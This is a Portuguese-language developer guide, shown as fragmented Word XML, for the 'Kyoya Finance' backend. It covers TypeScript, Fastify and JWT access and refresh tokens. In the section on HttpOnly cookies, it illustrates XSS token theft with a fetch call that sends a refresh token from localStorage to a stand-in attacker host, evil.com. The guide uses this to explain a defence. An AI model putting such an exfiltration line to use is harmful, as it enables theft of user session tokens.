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200"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">KYOYA FINANCE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Guia Técnico do Desenvolvedor</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="400"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="94A3B8"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">TypeScript · Fastify · JWT &amp; Refresh Tokens</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="200"/>
              <w:jc w:val="center"/>
            </w:pPr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─────────────────────────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24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Do zero ao backend em produção</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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Módulo 01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TypeScript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Por que usar tipos? O que muda no seu dia a dia?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O problema que o TypeScript resolve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 você já trabalhou com JavaScript, provavelmente já viu esse tipo de bug: você escreve uma função esperando um número, mas alguém (ou você mesmo, semanas depois) passa uma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string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O código roda, mas o resultado é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"101"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em vez de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11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e você só descobre em produção.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JavaScript — bug em produção</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="47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✅ TypeScript — erro em desenvolvimento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function somar(a, b)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return a +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// Isso não dá erro, mas está errado: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somar("10", 1) // retorna "101" !!!</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="16A34A" w:sz="1"/>
              <w:bottom w:val="single" w:color="16A34A" w:sz="1"/>
              <w:right w:val="single" w:color="16A34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function somar(a: number, b: number): number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a +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Erro sublinhado no editor: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somar("10",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Argument of type string is not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assignable to parameter of type number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💡  Resumo em uma frase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TypeScript é JavaScript com um "verificador de erros" embutido que roda antes do código. Você escreve os tipos das coisas e ele garante que ninguém vai usar errado.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Tipos básicos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Os tipos mais usados no dia a dia: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tipos-basicos.ts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Primitivos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nome: string = "Kyoya";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valor: number = 1250.50;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ativo: boolean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Arrays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lancamentos: number[] = [100, 200, 300];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tags: string[] = ["Essencial", "Outros"];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Null e undefined explícitos (com strict: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let obs: string | undefined = undefined;  // pode ser string OU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let erro: string | null = null;            // pode ser string OU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Nunca use "any" — isso desliga a proteção do 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coisa: any = "qualquer coisa"; // ❌ evitar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Interfaces e Types — definindo formatos de objetos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Kyoya, toda collection do MongoDB tem uma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interface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correspondente. Uma interface descreve o "formato" de um objeto — quais campos ele tem e de qual tipo é cada um.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src/types/index.ts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Interface — define o formato de um objeto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interface ILancamento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_id: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userId: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descricao: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valor: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tipo: "receita" | "despesa";   // só pode ser um desses dois valores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tag: "Essencial" | "Nao Essencial" | "Outros";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data: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pago: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mes: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caixinhaId?: string;           // ? = campo opcional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Agora o TypeScript sabe exatamente o que é um lançamento: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exibir = (lancamento: ILancamento)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console.log(lancamento.descricao); // ✅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console.log(lancamento.valor);     // ✅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console.log(lancamento.preco);     // ❌ Erro: "preco" não existe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🔑  interface vs type — qual usar?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Use "interface" para objetos e contratos (ILancamento, ICaixinha). Use "type" para uniões simples ou aliases: type Tag = "Essencial" | "Outros". Na dúvida, interface. No Kyoya usamos interface para todas as entidades.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1.4 Union Types — um campo que aceita mais de um tipo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 tipo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"receita" | "despesa"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que você viu acima é um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Union Type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Ele diz: "esse campo só pode ter esses valores específicos". É muito útil para campos com opções fixas, como enums.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union-types.ts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Sem TypeScript: qualquer string passaria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Com TypeScript: apenas esses valores são aceitos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TipoLancamento = "receita" | "despesa";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TagLancamento  = "Essencial" | "Nao Essencial" | "Outros";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Melhorei       = "SIM" | "NÃO" | "-";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Usando no código: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registrar = (tipo: TipoLancamento) =&gt; { ...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registrar("receita");    //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registrar("despesa");    //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registrar("transferencia"); // ❌ Erro imediato no editor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1.5 Generics — tipos que recebem outros tipos como parâmetro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Generics parecem assustadores mas são simples: é um tipo que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aceita outro tipo como parâmetro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Pense no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Array&lt;T&gt;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: um array pode conter números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Array&lt;number&gt;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), strings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Array&lt;string&gt;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) ou qualquer coisa. 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é o "parâmetro" do tipo.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generics.ts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Sem generic: você teria que criar uma função para cada tipo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primeiroNumero  = (arr: number[]):  number  =&gt; arr[0];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primeiraString  = (arr: string[]):  string  =&gt; arr[0];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... repetição infinita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Com generic: uma só função para qualquer tipo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primeiro = &lt;T&gt;(arr: T[]): T =&gt; arr[0];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primeiro([1, 2, 3]);         // TypeScript infere: T =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primeiro(["a", "b", "c"]);   // TypeScript infere: T =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No Kyoya, o axios usa generics assim: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response = await api.get&lt;{ data: ILancamento[] }&gt;("/lancamentos");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                          ^^^^^^^^^^^^^^^^^^^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           "essa requisição retorna um objeto com data: ILancamento[]"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Agora response.data.data tem autocomplete correto!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1.6 Utility Types — manipulando interfaces existentes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TypeScript tem tipos utilitários prontos para transformar interfaces sem precisar reescrever do zero. Você vai ver muito no Kyoya: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utility-types.ts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Partial&lt;T&gt; — todos os campos se tornam opcionais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Usado para updates (PATCH): você manda só o que quer mudar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AtualizarLancamentoInput = Partial&lt;CriarLancamentoInput&gt;;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Equivale a: { descricao?: string; valor?: number;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Omit&lt;T, K&gt; — remove campos de uma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Usado nos services para não exigir campos calculados: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SalvarPatrimonio = Omit&lt;IPatrimonio, "_id" | "userId" | "patrimonio" | "createdAt"&gt;;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Retira os campos que são gerados automaticamente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Pick&lt;T, K&gt; — pega só alguns campos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type CredenciaisLogin = Pick&lt;IUser, "email" | "password"&gt;;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Required&lt;T&gt; — todos os campos se tornam obrigatórios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(oposto de Partial)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🎯  O que você vai ver no kyoya-api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Toda função de service tem tipos explícitos: parâmetros tipados, retorno tipado. O TypeScript garante que você nunca vai chamar uma função passando os argumentos na ordem errada, ou esquecer de tratar um campo opcional.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Módulo 02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Fastify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Rotas, plugins, validação e o ciclo de vida de uma requisição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Por que Fastify e não Express?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Você provavelmente já ouviu falar de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Express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O Fastify resolve os mesmos problemas, mas com três vantagens importantes para o Kyoya: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87171"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Express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6EFAC"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Fastify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Mais lento (sem serialização otimizada)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~10x mais rápido no JSON serialization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Tipos via @types/express, genéricos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TypeScript nativo, tipos embutidos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Middleware separado (express-validator)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Schema validation nativo via JSON Schema / Zod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Plugins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Middleware simples, sem isolamento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Sistema de plugins com encapsulamento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A instância do Fastify e o server.ts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Tudo começa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Fastify()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Você cria uma instância, registra plugins, registra rotas e manda ouvir uma porta. Veja como isso aparece no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kyoya-api/src/server.ts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src/server.ts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import Fastify from "fastify";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1. Cria a instância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fastify = Fastify({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logger: true,  // loga cada requisição no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2. Registra plugins (CORS, JWT, cookies...)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await fastify.register(cors, { origin: "http://localhost:5173"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await fastify.register(jwt,  { secret: process.env.JWT_SECRET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3. Registra grupos de rotas com prefixo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fastify.register(authRoutes,        { prefix: "/api/v1/auth"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fastify.register(lancamentosRoutes, { prefix: "/api/v1/lancamentos"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4. Inicia o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await fastify.listen({ port: 3333, host: "0.0.0.0"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console.log("🚀 API rodando em http://localhost:3333");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Rotas — GET, POST, PATCH, DELETE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Cada rota é uma função que recebe uma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request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(o que chegou) e uma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reply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(a resposta que você vai mandar). Com TypeScript, você define os tipos do body, params e query — e o Fastify valida automaticamente antes de entrar na função.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rotas-basicas.ts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Rota GET simples — sem parâmetros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fastify.get("/",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lancamentos = await Lancamento.find({ userId: request.user.userId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reply.send({ data: lancamentos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Rota GET com query string — ex: GET /lancamentos?mes=2026-03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fastify.get&lt;{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Querystring: { mes?: string; tag?: string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&gt;("/",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{ mes, tag } = request.query;  // TypeScript sabe os tipos!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Rota POST — recebe JSON no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fastify.post&lt;{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Body: { descricao: string; valor: number; tipo: "receita" | "despesa"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&gt;("/",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{ descricao, valor } = request.body;  // tipado!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novo = await Lancamento.create({ ...request.body, userId: "123"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reply.status(201).send({ data: novo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Rota PATCH — atualiza parcialmente (/:id nos params)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fastify.patch&lt;{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Params: { id: string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Body: { pago?: boolean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&gt;( "/:id",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{ id } = request.params;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Rota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fastify.delete&lt;{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Params: { id: string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&gt;( "/:id",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Lancamento.deleteOne({ _id: request.params.id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reply.status(204).send();  // 204 = sem conteúdo na resposta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2.4 Plugins — como o Fastify se organiza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Um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plugin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no Fastify é qualquer funcionalidade encapsulada que você pode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registrar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Pense como peças de lego: você monta o servidor registrando as peças que precisa. Cada plugin tem acesso ao escopo onde foi registrado.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src/plugins/index.ts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src/plugins/index.ts — registra todos os plugins de uma vez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registerPlugins = async (fastify: FastifyInstance)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@fastify/cors — permite que o frontend (outra origem) acesse a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fastify.register(cors,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origin: "http://localhost:5173",  // só o frontend pode chamar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credentials: true,                // permite enviar cookies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@fastify/cookie — habilita leitura/escrita de cookies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Necessário para o refreshToken (cookie HttpOnly)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fastify.register(cookie);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@fastify/jwt — assinar e verificar tokens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fastify.register(jwt,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secret: process.env.JWT_SECRET,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sign: { expiresIn: "15m" },  // default de expiração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@fastify/rate-limit — bloqueia brute force (ex: 100 req/min)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fastify.register(rateLimit,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max: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timeWindow: "1 minute",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2.5 Hooks — interceptando o ciclo de vida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Hooks são funções que rodam em momentos específicos do ciclo de vida de uma requisição. O mais usado no Kyoya é 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preHandler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que roda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antes do handler principal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e é onde fica a verificação de autenticação.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src/modules/lancamentos/lancamento.routes.ts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Ciclo de vida simplificado de uma requisição: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Requisição chega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onRequest   (primeiros hooks — logging, rate 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preHandler  ← AQUI fica o authGuard (verifica JWT)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handler     ← sua função de rota (controller)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onSend      (serialização da resposta)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 Resposta enviada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Aplicar o authGuard em uma rota específica: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fastify.get("/", { preHandler: authGuard }, meuController);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Aplicar em TODAS as rotas de um grupo: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lancamentosRoutes = async (fastify: FastifyInstance)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fastify.addHook("preHandler", authGuard); // todas as rotas abaixo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fastify.get("/",    listarController);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fastify.post("/",   criarController);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fastify.patch("/:id", atualizarController);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2.6 Validação com Zod — nunca confie no que chega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Uma das regras mais importantes de backend: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nunca confie em dados que chegam da rede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Um usuário pode mandar qualquer coisa. O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Zod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define um schema do que é permitido e rejeita automaticamente o que não encaixa — antes mesmo de chegar na sua lógica.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lancamento.schema.ts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src/modules/lancamentos/lancamento.schema.ts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import { z } from "zod";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criarLancamentoSchema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descricao:  z.string().min(1, "Descrição obrigatória").max(100),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valor:      z.number().positive("Valor deve ser positivo"),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tipo:       z.enum(["receita", "despesa"]),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tag:        z.enum(["Essencial", "Nao Essencial", "Outros"]),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data:       z.coerce.date(),   // converte string "2026-03-15" para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pago:       z.boolean().default(false),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caixinhaId: z.string().regex(/^[a-f\d]{24}$/i).optional(),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TypeScript extrai o tipo automaticamente do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type CriarLancamentoInput = z.infer&lt;typeof criarLancamentoSchema&gt;;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Resultado: { descricao: string; valor: number; tipo: "receita" | "despesa";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 chegarem dados inválidos, o Fastify retorna 400 automaticamente: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{ "message": "Valor deve ser positivo"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2.7 O padrão Routes → Controller → Service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 kyoya-api usa uma separação clara de responsabilidades. Cada camada tem uma única função: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🏗️  Responsabilidade de cada camada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routes.ts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onde estão as rotas, quais middlewares usar, o que vai para qual controller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controller.ts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recebe request, chama o service, envia a reply. Não tem lógica de negócio.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service.ts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toda a lógica: valida regras, acessa o banco, lança AppError se algo errar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padrão routes → controller →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routes.ts — "o mapa das estradas"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fastify.post("/", { schema: { body: criarLancamentoSchema } }, criarController);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controller.ts — "o recepcionista"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criarController =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Só recebe, repassa e responde. Sem lógica.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lancamento = await criarLancamento(request.user.userId, request.body);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reply.status(201).send({ data: lancamento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service.ts — "onde o trabalho acontece"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criarLancamento = async (userId: string, dados: CriarLancamentoInput)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Lógica: calcula o mês, salva no banco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mes = toMesKey(dados.data);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Lancamento.create({ ...dados, userId, mes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2.8 AppError — erros esperados vs inesperados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Nem todo erro é um bug. Quando o usuário tenta fazer login com senha errada, isso é um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erro esperado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você sabe que pode acontecer e sabe o que responder. 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AppError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existe para isso.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AppError — erros de negócio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src/shared/utils/AppError.ts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class AppError extends Error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public readonly statusCode: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constructor(message: string, statusCode: number = 400)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super(message);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this.statusCode = statusCode;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Uso no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loginUsuario = async (dados: LoginInput)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usuario = await User.findOne({ email: dados.email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if (!usuario)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// Lança um AppError — não é um bug, é uma regra de negócio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throw new AppError("E-mail ou senha inválidos",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O errorHandler global captura e responde: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if (error instanceof AppError)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reply.status(error.statusCode).send({ message: error.message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Cliente recebe: { "message": "E-mail ou senha inválidos"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Módulo 03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JWT &amp; Autenticação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Como o servidor sabe quem você é — sem guardar sessões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O problema — como provar identidade em HTTP?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HTTP é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stateless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cada requisição é independente, o servidor não lembra de você. Então como você faz login uma vez e fica autenticado nas próximas chamadas?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resposta clássica era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sessões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: o servidor guardava "usuário X está logado" em memória ou banco, e o cliente mandava um sessionId em cada requisição. Isso funciona, mas tem problemas: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Não escala bem em múltiplos servidores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Estado no servidor = mais complexidade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Difícil de usar em apps mobile/frontend separado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solução moderna é o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JWT (JSON Web Token)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: o servidor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não guarda nada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Em vez disso, ele cria um "documento assinado" com a identidade do usuário e entrega para o cliente. O cliente manda esse documento em cada requisição, e o servidor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verifica a assinatura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sem precisar consultar banco.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O que é um JWT — anatomia do token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Um JWT é uma string com 3 partes separadas por ponto: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header.payload.signature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Cada parte é codificada em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Base64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(não é criptografia — qualquer um pode decodificar o header e payload!).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anatomia do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Token completo (como você vê na prática):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eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9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.eyJ1c2VySWQiOiI2NjVmMWEyYiIsImVtYWlsIjoidGVzdGVAa3lvamEuY29tIiwiaWF0IjoxNzE3MDAwMDAwLCJleHAiOjE3MTcwMDA5MDB9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.xK8pQ2mNvR4sT7uW9zA1bC3dE5fG6hI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Decodificando cada parte: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PARTE 1 — Header (algoritmo usado)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"alg": "HS256",   // HMAC SHA-256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"typ": "JWT"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PARTE 2 — Payload (dados do usuário + metadados)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"userId": "665f1a2b",            // quem você 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"email":  "teste@kyoya.com",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"iat":    1717000000,             // issued at (quando foi criado)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"exp":    1717000900              // expires at (quando expira)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PARTE 3 — Signature (garante que ninguém alterou o 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= HMAC_SHA256(base64(header) + "." + base64(payload), JWT_SECRET)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410C" w:sz="1"/>
              <w:left w:val="single" w:color="C2410C" w:sz="12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🔐  A assinatura é o que garante a segurança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 payload é público — qualquer um pode ler. Mas para criar um token válido, você precisa do JWT_SECRET (que só o servidor tem). Se alguém tentar alterar o payload e remover o "exp", a assinatura fica inválida e o servidor rejeita.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O fluxo completo de login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Veja exatamente o que acontece quando o usuário faz login no Kyoya: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fluxo de login — auth.service.ts + auth.controller.ts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1. CLIENTE envia credenciais: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POST /api/v1/auth/login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"email":    "eu@kyoya.com",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"password": "minha_senha"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2. SERVIDOR — auth.service.ts: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loginUsuario = async (dados, fastify)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a) Busca o usuário no banco (com a senha hasheada)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usuario = await User.findOne({ email: dados.email }).select("+password");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b) Compara a senha enviada com o hash bcrypt no banco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senhaValida = await bcrypt.compare(dados.password, usuario.password);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if (!senhaValida) throw new AppError("E-mail ou senha inválidos", 401);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c) Cria os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payload = { userId: usuario._id, email: usuario.email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accessToken  = fastify.jwt.sign(payload, { expiresIn: "15m"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refreshToken = fastify.jwt.sign(payload,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secret: process.env.JWT_REFRESH_SECRET,  // secret DIFERENTE!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expiresIn: "7d",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d) Salva HASH do refreshToken no banco (para invalidar no logout)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hash = await bcrypt.hash(refreshToken, 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User.findByIdAndUpdate(usuario._id, { refreshToken: hash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{ accessToken, refreshToken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3. SERVIDOR — auth.controller.ts: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{ accessToken, refreshToken } = await loginUsuario(dados, fastify);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accessToken vai no BODY (JavaScript lê e guarda em memória)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refreshToken vai em COOKIE HttpOnly (JavaScript NÃO consegue ler!)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.setCookie("refreshToken", refreshToken,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httpOnly: true,   // protege de XSS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secure: true,     // só HTTPS em produção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sameSite: "strict",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maxAge: 60 * 60 * 24 * 7,  // 7 dias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.send({ accessToken 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Access Token vs Refresh Token — por que dois tokens?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Essa é a parte que mais confunde. Por que não usar um token só com expiração longa? A resposta é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segurança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410C" w:sz="1"/>
              <w:left w:val="single" w:color="C2410C" w:sz="12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⚠️  O dilema de segurança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Token com expiração longa (ex: 30 dias)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se alguém roubar, tem acesso por 30 dias inteiros. Impossível revogar sem banco de dados.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Token com expiração curta (ex: 15 min)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seguro! Se roubar, expira em 15 min. Mas o usuário teria que fazer login a cada 15 minutos — péssima UX.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Solução: dois tokens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accessToken curto para as chamadas, refreshToken longo para renovar silenciosamente.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A5E9"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">accessToken</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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D399"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">refreshToken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15 minutos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Onde fica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Memória JS (Zustand)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Cookie HttpOnly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Enviado em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Header: Authorization: Bearer ...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Automaticamente pelo browser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JS pode ler?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Não (HttpOnly protege)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Uso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Toda chamada à API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Só para renovar o accessToken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Revogável?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Não (mas expira em 15min)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Sim (hash no banco, deletado no logout)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O Refresh automático — como o frontend renova sem o usuário perceber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Quando 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accessToken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expira, o servidor retorna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 Em vez de jogar o usuário para a tela de login, o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Axios interceptor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no frontend captura esse 401, pede um novo token silenciosamente e refaz a chamada original. Tudo transparente.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src/lib/axios.ts — refresh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src/lib/axios.ts — interceptor de resposta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api.interceptors.response.use(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(response) =&gt; response, // sucesso: passa direto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async (error)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const request = error.config;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// Só age se for 401 e ainda não tentou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if (error.response?.status !== 401 || request._retry)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return Promise.reject(error);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request._retry = true; // marca para não entrar em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// 1. Pede novo accessToken usando o cookie refreshToken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//    (o browser envia o cookie automaticamente)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const { data } = await axios.post("/api/v1/auth/refresh", {},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  withCredentials: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// 2. Atualiza o token no Zustand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useAuthStore.getState().setAccessToken(data.accessToken);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// 3. Refaz a chamada original com o novo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request.headers.Authorization = `Bearer ${data.accessToken}`;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return api(request); // ← usuário nunca percebeu que expirou!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// refreshToken também expirou: manda para o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useAuthStore.getState().logout();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  window.location.href = "/login";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3.6 O fluxo completo de uma requisição autenticada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Juntando tudo — o que acontece do clique do usuário até a resposta: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fluxo completo — clique até resposta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Usuário clica em "Ver lançamentos"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FRONTEND — axios.ts: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1. Injeta o accessToken no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config.headers.Authorization = `Bearer ${accessToken}`;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SERVIDOR — authGuard.ts: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2. Intercepta antes do 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authGuard =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await request.jwtVerify(); // verifica assinatura + expiração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// Se OK: request.user = { userId: "...", email: "..."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reply.status(401).send({ message: "Não autorizado"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SERVIDOR — lancamento.service.ts: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3. Usa o userId do token para filtrar APENAS dados do usuário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listarLancamentos = async (userId: string, mes: string)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Lancamento.find({ userId, mes }).lean();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                     ^^^^^^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Nunca retorna dados de outros usuários!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SERVIDOR — lancamento.controller.ts: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4. Passa o userId do token (não do body — nunca confie no cliente)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listarController =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const data = await listarLancamentos(request.user.userId, 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return reply.send({ data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3.7 Por que o refreshToken fica em Cookie HttpOnly?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Essa é uma decisão de segurança crítica. Existem dois tipos de ataque que isso previne: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🛡️  Proteções do Cookie HttpOnly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XSS (Cross-Site Scripting)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Se um atacante injetar JavaScript malicioso na página, ele pode ler localStorage e memória. Mas NUNCA consegue ler um cookie HttpOnly — o browser bloqueia acesso JS a ele.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SameSite=Strict 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→ O cookie só é enviado em requisições originadas do seu próprio domínio. Isso previne CSRF (Cross-Site Request Forgery), onde um site malicioso tenta fazer requisições no seu nome.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Se guardasse em localStorage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="47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✅ Cookie HttpOnly — JS não acessa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// Qualquer JS na página pode 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localStorage.getItem("refreshToken")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// Um script malicioso faria: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fetch("https://evil.com/steal",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body: localStorage.getItem("refreshToken")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// Token roubado!</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="16A34A" w:sz="1"/>
              <w:bottom w:val="single" w:color="16A34A" w:sz="1"/>
              <w:right w:val="single" w:color="16A34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Browser envia automaticamente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JS não consegue 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document.cookie // não mostra HttpOnly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Script malicioso não consegue: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document.cookie.match(/refreshToken/)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undefined — protegido pelo browser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3.8 Logout — invalidando a sessão no banco</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80"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Diferente do accessToken (que expira sozinho), o refreshToken pode ser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invalidado ativamente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no logout. É por isso que salvamos o hash dele no banco.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F2FE"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">logout — invalidando no banco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FRONTEND — clicou em "Sair"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await api.post("/api/v1/auth/logout");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useAuthStore.getState().logout(); // limpa o token da memória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navigate("/login");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SERVIDOR — auth.service.ts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logoutUsuario = async (userId: string)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// Remove o refreshToken do banco — esse usuário não pode mais renovar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User.findByIdAndUpdate(userId, { refreshToken: null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SERVIDOR — auth.controller.ts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export const logoutController = async (request, reply)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await logoutUsuario(request.user.userId);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.clearCookie("refreshToken", { path: "/" }) // remove o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.status(200)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.send({ message: "Sessão encerrada"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O que acontece se alguém tentar usar o refreshToken depois do logout?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// auth.service.ts — renovarToken():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const usuario = await User.findById(payload.userId).select("+refreshToken");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if (!usuario?.refreshToken)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throw new AppError("Sessão inválida", 401); // ← bloqueado!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Resumo Final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4"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">✦  TypeScript</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="16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Tipos previnem bugs em desenvolvimento. Interfaces definem o "formato" de objetos. Generics permitem código reutilizável. Utility Types (Partial, Omit, Pick) transformam interfaces existentes.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4"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">✦  Fastify</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="16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Plugins encapsulam funcionalidades. Hooks interceptam o ciclo de vida. Validação com Zod rejeita inputs inválidos antes do controller. Routes → Controller → Service separa responsabilidades.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4"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">✦  JWT &amp; Auth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JWT é stateless — o servidor não guarda sessão. Access token curto (15min) para segurança. Refresh token longo (7d) em cookie HttpOnly para renovação silenciosa. HttpOnly protege de XSS. Hash no banco permite logout real.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2026-03-03T20:07:50.666Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-03T20:07:50.679Z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